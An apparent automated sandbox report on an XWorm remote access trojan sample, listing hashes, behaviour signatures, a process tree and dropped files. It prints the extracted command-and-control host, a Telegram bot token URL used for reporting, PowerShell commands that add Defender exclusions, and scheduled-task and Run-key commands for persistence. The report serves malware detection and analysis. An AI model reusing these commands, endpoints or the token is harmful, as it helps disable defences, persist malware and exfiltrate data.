xworm | 404a515445e44719d42c8689968c39b4903d9fb65bab7624cd14a943b7809ae8

Analysis

max time kernel
122s
max time network
128s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
30-06-2024 19:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

22Executor (1).exe
Size

14.3MB
MD5

2f6ccdc5a983127eb4619c0131b22f74
SHA1

ea606124c913238a1cd06ed46cf297467634745a
SHA256

404a515445e44719d42c8689968c39b4903d9fb65bab7624cd14a943b7809ae8
SHA512

97ebbd6814cc8451ed14f573bcf9d81f025e2a127df71f6632eece8886952edda5ed075a48f88e859a044c6070bfd64035922ff171689df8b3f6428813d1c9a1
SSDEEP

1536:efT1xxuiGO+oS2tXFlGXyjXnq7CkHOHmvkKUUgFv2qsFjAk1CortszhXXIX8xe2X:G2HoZXFlAyjrkHOHRFsFcGtsz1ef29d

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

tr3.localto.net:44953

Attributes

Install_directory
%ProgramData%
install_file
svchhost.exe
telegram
https://api.telegram.org/bot6919369290:AAGnnKr1Yo67mV9jYUriuVi-XAno2tdvbq0/sendMessage?chat_id=6340808873

Signatures

Detect Xworm Payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe	family_xworm
behavioral1/memory/2592-22-0x00000000001A0000-0x00000000001BC000-memory.dmp	family_xworm
behavioral1/memory/1700-60-0x00000000011E0000-0x00000000011FC000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

2032 powershell.exe
1200 powershell.exe
2392 powershell.exe
988 powershell.exe
1844 powershell.exe
2708 powershell.exe
1716 powershell.exe
2184 powershell.exe
1988 powershell.exe

Drops startup file 6 IoCs

Processes:

svchhost.exe22Executor (1).exe22Exe.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchhost.lnk	svchhost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchhost.lnk	svchhost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe	22Executor (1).exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe	22Executor (1).exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchhost.lnk	22Exe.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchhost.lnk	22Exe.exe

Executes dropped EXE 3 IoCs

Processes:

22.exe22Exe.exesvchhost.exe

pid process

2568 22.exe
2592 22Exe.exe
1700 svchhost.exe
Loads dropped DLL 5 IoCs

Processes:

WerFault.exe

pid process

2588 WerFault.exe
2588 WerFault.exe
2588 WerFault.exe
2588 WerFault.exe
2588 WerFault.exe

pid	process
2568	22.exe
2592	22Exe.exe
1700	svchhost.exe

pid	process
2588	WerFault.exe
2588	WerFault.exe
2588	WerFault.exe
2588	WerFault.exe
2588	WerFault.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

22Exe.exesvchhost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchhost = "C:\\ProgramData\\svchhost.exe"	22Exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchhost = "C:\\ProgramData\\svchhost.exe"	svchhost.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 ip-api.com

flow	ioc
4	ip-api.com

Drops file in System32 directory 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2588 2568 WerFault.exe 22.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

1208 timeout.exe
2132 timeout.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

2584 schtasks.exe
2244 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

22Exe.exesvchhost.exe

pid process

2592 22Exe.exe
1700 svchhost.exe

pid	pid_target	process	target process
2588	2568	WerFault.exe	22.exe

pid	process
1208	timeout.exe
2132	timeout.exe

pid	process
2584	schtasks.exe
2244	schtasks.exe

pid	process
2592	22Exe.exe
1700	svchhost.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe22Exe.exepowershell.exepowershell.exepowershell.exepowershell.exesvchhost.exe

pid	process
2032	powershell.exe
2708	powershell.exe
1716	powershell.exe
1200	powershell.exe
2392	powershell.exe
2592	22Exe.exe
988	powershell.exe
2184	powershell.exe
1988	powershell.exe
1844	powershell.exe
1700	svchhost.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exe22Exe.exepowershell.exepowershell.exepowershell.exepowershell.exesvchhost.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	2592	22Exe.exe
Token: SeDebugPrivilege	2708	powershell.exe
Token: SeDebugPrivilege	1716	powershell.exe
Token: SeDebugPrivilege	1200	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2592	22Exe.exe
Token: SeDebugPrivilege	1700	svchhost.exe
Token: SeDebugPrivilege	988	powershell.exe
Token: SeDebugPrivilege	2184	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeDebugPrivilege	1700	svchhost.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

22Exe.exesvchhost.exe

pid process

2592 22Exe.exe
1700 svchhost.exe

pid	process
2592	22Exe.exe
1700	svchhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

22Executor (1).exe22.exe22Exe.exetaskeng.execmd.exesvchhost.execmd.exe

description	pid	process	target process
PID 1768 wrote to memory of 2568	1768	22Executor (1).exe	22.exe
PID 1768 wrote to memory of 2568	1768	22Executor (1).exe	22.exe
PID 1768 wrote to memory of 2568	1768	22Executor (1).exe	22.exe
PID 1768 wrote to memory of 2568	1768	22Executor (1).exe	22.exe
PID 1768 wrote to memory of 2032	1768	22Executor (1).exe	powershell.exe
PID 1768 wrote to memory of 2032	1768	22Executor (1).exe	powershell.exe
PID 1768 wrote to memory of 2032	1768	22Executor (1).exe	powershell.exe
PID 1768 wrote to memory of 2592	1768	22Executor (1).exe	22Exe.exe
PID 1768 wrote to memory of 2592	1768	22Executor (1).exe	22Exe.exe
PID 1768 wrote to memory of 2592	1768	22Executor (1).exe	22Exe.exe
PID 2568 wrote to memory of 2588	2568	22.exe	WerFault.exe
PID 2568 wrote to memory of 2588	2568	22.exe	WerFault.exe
PID 2568 wrote to memory of 2588	2568	22.exe	WerFault.exe
PID 2568 wrote to memory of 2588	2568	22.exe	WerFault.exe
PID 2592 wrote to memory of 2708	2592	22Exe.exe	powershell.exe
PID 2592 wrote to memory of 2708	2592	22Exe.exe	powershell.exe
PID 2592 wrote to memory of 2708	2592	22Exe.exe	powershell.exe
PID 2592 wrote to memory of 1716	2592	22Exe.exe	powershell.exe
PID 2592 wrote to memory of 1716	2592	22Exe.exe	powershell.exe
PID 2592 wrote to memory of 1716	2592	22Exe.exe	powershell.exe
PID 2592 wrote to memory of 1200	2592	22Exe.exe	powershell.exe
PID 2592 wrote to memory of 1200	2592	22Exe.exe	powershell.exe
PID 2592 wrote to memory of 1200	2592	22Exe.exe	powershell.exe
PID 2592 wrote to memory of 2392	2592	22Exe.exe	powershell.exe
PID 2592 wrote to memory of 2392	2592	22Exe.exe	powershell.exe
PID 2592 wrote to memory of 2392	2592	22Exe.exe	powershell.exe
PID 2592 wrote to memory of 2244	2592	22Exe.exe	schtasks.exe
PID 2592 wrote to memory of 2244	2592	22Exe.exe	schtasks.exe
PID 2592 wrote to memory of 2244	2592	22Exe.exe	schtasks.exe
PID 1952 wrote to memory of 1700	1952	taskeng.exe	svchhost.exe
PID 1952 wrote to memory of 1700	1952	taskeng.exe	svchhost.exe
PID 1952 wrote to memory of 1700	1952	taskeng.exe	svchhost.exe
PID 2592 wrote to memory of 788	2592	22Exe.exe	schtasks.exe
PID 2592 wrote to memory of 788	2592	22Exe.exe	schtasks.exe
PID 2592 wrote to memory of 788	2592	22Exe.exe	schtasks.exe
PID 2592 wrote to memory of 1008	2592	22Exe.exe	cmd.exe
PID 2592 wrote to memory of 1008	2592	22Exe.exe	cmd.exe
PID 2592 wrote to memory of 1008	2592	22Exe.exe	cmd.exe
PID 1008 wrote to memory of 1208	1008	cmd.exe	timeout.exe
PID 1008 wrote to memory of 1208	1008	cmd.exe	timeout.exe
PID 1008 wrote to memory of 1208	1008	cmd.exe	timeout.exe
PID 1700 wrote to memory of 988	1700	svchhost.exe	powershell.exe
PID 1700 wrote to memory of 988	1700	svchhost.exe	powershell.exe
PID 1700 wrote to memory of 988	1700	svchhost.exe	powershell.exe
PID 1700 wrote to memory of 2184	1700	svchhost.exe	powershell.exe
PID 1700 wrote to memory of 2184	1700	svchhost.exe	powershell.exe
PID 1700 wrote to memory of 2184	1700	svchhost.exe	powershell.exe
PID 1700 wrote to memory of 1988	1700	svchhost.exe	powershell.exe
PID 1700 wrote to memory of 1988	1700	svchhost.exe	powershell.exe
PID 1700 wrote to memory of 1988	1700	svchhost.exe	powershell.exe
PID 1700 wrote to memory of 1844	1700	svchhost.exe	powershell.exe
PID 1700 wrote to memory of 1844	1700	svchhost.exe	powershell.exe
PID 1700 wrote to memory of 1844	1700	svchhost.exe	powershell.exe
PID 1700 wrote to memory of 2584	1700	svchhost.exe	schtasks.exe
PID 1700 wrote to memory of 2584	1700	svchhost.exe	schtasks.exe
PID 1700 wrote to memory of 2584	1700	svchhost.exe	schtasks.exe
PID 1700 wrote to memory of 2196	1700	svchhost.exe	schtasks.exe
PID 1700 wrote to memory of 2196	1700	svchhost.exe	schtasks.exe
PID 1700 wrote to memory of 2196	1700	svchhost.exe	schtasks.exe
PID 1700 wrote to memory of 2496	1700	svchhost.exe	cmd.exe
PID 1700 wrote to memory of 2496	1700	svchhost.exe	cmd.exe
PID 1700 wrote to memory of 2496	1700	svchhost.exe	cmd.exe
PID 2496 wrote to memory of 2132	2496	cmd.exe	timeout.exe
PID 2496 wrote to memory of 2132	2496	cmd.exe	timeout.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\22Executor (1).exe
"C:\Users\Admin\AppData\Local\Temp\22Executor (1).exe"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1768

C:\Users\Admin\AppData\Local\Temp\22.exe
"C:\Users\Admin\AppData\Local\Temp\22.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2568 -s 628
3⤵
- Loads dropped DLL
- Program crash
PID:2588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe'
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe"
2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '22Exe.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchhost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchhost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2392

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchhost" /tr "C:\ProgramData\svchhost.exe"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2244

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /f /tn "svchhost"
3⤵
PID:788

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpE273.tmp.bat""
3⤵
- Suspicious use of WriteProcessMemory
PID:1008

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:1208

C:\Windows\system32\taskeng.exe
taskeng.exe {61B00CE3-75AB-46C6-84BC-303FB6449992} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1952

C:\ProgramData\svchhost.exe
C:\ProgramData\svchhost.exe
2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchhost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchhost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchhost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchhost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1844

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchhost" /tr "C:\ProgramData\svchhost.exe"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2584

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /f /tn "svchhost"
3⤵
PID:2196

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2166.tmp.bat""
3⤵
- Suspicious use of WriteProcessMemory
PID:2496

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:2132

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\22.exe
Filesize
53KB

MD5
26f0ceb6deadcade5fc0f8c407039d85

SHA1
40c28e32bcb62ed98d91344b6bb202aee3b45a96

SHA256
aa084872bd13860993b33d46aa7285e1828d3139aba727a644a93d519491f18f

SHA512
71683db2320e0a6c73cbffc1855c1345ced2bbc0a44feeb0e0372ee184e57208a47d896de3b14a18fcaacd1ec9a632052074ffcf6a483f06e07a7650cffc4181

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2166.tmp.bat
Filesize
141B

MD5
bcecab0d807f24e46c6d763df24f5f64

SHA1
6b6042145a89b6df48797324af803654deeb78b8

SHA256
1cf7846108267f7f2484d2b343ae8e7b6e910dadaa2641db3a85fc16fc9b739c

SHA512
ea44fb9809d6f819da2ef6a5f4c0304a1258c4b5850918007fe5dced6db1b5d195ef08574975ccf72ac7463be5bd0d9ba8788bbc70ab1cff636f258a31ea1dc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpE273.tmp.bat
Filesize
200B

MD5
7f106ddea3375ce6d7c66917898ca66f

SHA1
45cd571f30faeea65fa4e309b95f89e39c6ad02a

SHA256
15b4436193e09d243528fab93ea7f1393a0a1278ebe3c579a89fc8402306bce7

SHA512
8ea48c5151174ce5ea99202959648901a145d25ee775318834710090270697e77d640d73a3d62446423ccd40bc0fd9c0c2614c8ce56641a4fcd1a87d0f73e7a5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
9b8b377616485300519b217c109622f0

SHA1
cb84ed0de6983fac1f9a008b4b444c133c0fba71

SHA256
e7b0aefdb1887f969eef75938b99173da8e23e173870598449895445c14cd59d

SHA512
d63583dfc3fdfd823bb80c3831b423190f32ff562e2e728eceb45ed88c7127ea8720fb24cbed5c9a9693ddb07fab2fa47d56c16c8bedd9df99a163bd14335a7b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IL1PUPISVGX2TL1IHTBF.temp
Filesize
7KB

MD5
607d1b8099c38dfde6caea6bc5cdbb36

SHA1
6dd1b8086bd329acf27eeff310abccdc8b15e74b

SHA256
4cf7cc6e02217047224007c4b58bd5cc33c2154895c32b4dcd8e2ed9865e03dc

SHA512
a420417d6e7c0f7ea99dbd4479f3aa9a3e7562c676fb359a680fcf68ebd8158b470e0586ff7e32d2b07a8c01f195199cf084649329ebbdab0a8e9262a3cbf39b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe
Filesize
89KB

MD5
a748f90b8a2ae76abca49e988f684448

SHA1
4fdb6d05574d6da4dec15c532ab773e2b6edcaf6

SHA256
d0928439360838dfdbfefe96ef20922518ee0a9224ad17372587dce5894df41a

SHA512
6401b64a363a40d11317d33aa0aed26c6a6a191661e6eadc653b2b4deef24120b715bc83748d4f41ff3afbb145c466898b74cc252c6fb2dadc8dbb1b36f83bb2

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/988-77-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/988-76-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

Filesize
2.9MB

Download
memory/1700-60-0x00000000011E0000-0x00000000011FC000-memory.dmp

Filesize
112KB

Download
memory/1716-40-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/1716-41-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/1768-0-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp

Filesize
4KB

Download
memory/1768-21-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/1768-1-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2032-14-0x0000000002040000-0x0000000002048000-memory.dmp

Filesize
32KB

Download
memory/2032-13-0x000000001B6A0000-0x000000001B982000-memory.dmp

Filesize
2.9MB

Download
memory/2184-83-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/2184-84-0x0000000001D70000-0x0000000001D78000-memory.dmp

Filesize
32KB

Download
memory/2568-12-0x0000000001230000-0x0000000001244000-memory.dmp

Filesize
80KB

Download
memory/2592-22-0x00000000001A0000-0x00000000001BC000-memory.dmp

Filesize
112KB

Download
memory/2708-34-0x0000000002910000-0x0000000002918000-memory.dmp

Filesize
32KB

Download
memory/2708-33-0x000000001B510000-0x000000001B7F2000-memory.dmp

Filesize
2.9MB

Download